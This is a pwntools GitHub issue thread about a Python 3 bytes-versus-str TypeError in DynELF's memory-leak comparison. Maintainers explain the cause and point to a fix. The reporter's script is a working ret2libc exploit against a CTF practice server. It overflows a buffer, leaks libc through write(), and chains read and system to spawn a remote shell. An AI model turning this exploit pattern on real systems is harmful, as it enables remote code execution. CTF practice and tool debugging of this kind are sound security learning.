### ISSUE TITLE
TypeError: string argument without an encoding

### ISSUE THREAD

**Issue by shanzhuer** [Gallopsled/pwntools#1490]
```python
from pwn import*

a=remote("pwn2.jarvisoj.com","9880")

elf=ELF("level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0")

plt_write=elf.symbols["write"]

vulner_addr=elf.symbols["vulnerable_function"]

def leak(addr):
	payload='A'*140 + p32(plt_write) + p32(vulner_addr) + p32(1) + p32(addr) + p32(4)
	a.send(payload)
	data=a.recv(4)
	return data

b=DynELF(leak,elf=ELF("level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0"))

system_addr=b.lookup("system","libc")

plt_read=elf.symbols["read"]

bss_addr=0x0804A024

pppr_addr=0x08048509

payload1='A'*140+p32(plt_read)+p32(pppr_addr)+p32(0)+p32(bss_addr)+p32(8)+p32(system_addr)+p32(1)+p32(bss_addr)

a.sendline(payload1)

a.sendline("/bin/sh")

a.interactive()
```
i got a TypeError: string argument without an encoding when i run the script above.
the error detail:
Traceback (most recent call last):
  File "level4.py", line 17, in <module>
    b=DynELF(leak,elf=ELF("level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0"))
  File "/usr/local/lib/python3.5/dist-packages/pwntools-4.0.1-py3.5.egg/pwnlib/dynelf.py", line 182, in __init__
    self.libbase = self._find_base(pointer or elf.address)
  File "/usr/local/lib/python3.5/dist-packages/pwntools-4.0.1-py3.5.egg/pwnlib/dynelf.py", line 295, in _find_base
    if self.leak.compare(ptr, '\x7fELF'):
  File "/usr/local/lib/python3.5/dist-packages/pwntools-4.0.1-py3.5.egg/pwnlib/memleak.py", line 546, in compare
    for i, byte in enumerate(bytearray(bts)):
TypeError: string argument without an encoding
i hv no idea about this...

**Comment by zachriggle** [comment]
It looks like we need to specify `b'\x7fELF'` due to Python3.  If you could make a pull request that would be great!

This likely slipped through since there are very few (zero?) doctests for the MemLeak stuff.

**Comment by Arusekk** [comment]
Just as the error message says, you used *string*, while you should use *bytes*.
Syntax is b'A' * 200, not 'A'*200 (etc.)

**Comment by shanzhuer** [comment]
> Just as the error message says, you used *string*, while you should use *bytes*. Syntax is b'A' * 200, not 'A'*200 (etc.)

i use b'A'*140, still not working...

**Comment by shanzhuer** [comment]
> It looks like we need to specify `b'\x7fELF'` due to Python3. If you could make a pull request that would be great!
> 
> This likely slipped through since there are very few (zero?) doctests for the MemLeak stuff.

oh my god, i got a lot of error from other place after i specify b'\x7fELF' because the incompatibility between bytes and str in python3. i guess it starts up from the return of p32 is bytes-like, then the payloads str become bytes-like.

**Comment by zachriggle** [comment]
The issues with `bytes` vs `str` is definitely annoying.  You might want to give Python2 a go, Pwntools still supports it.

**Comment by Arusekk** [comment]
Fixed in #1426
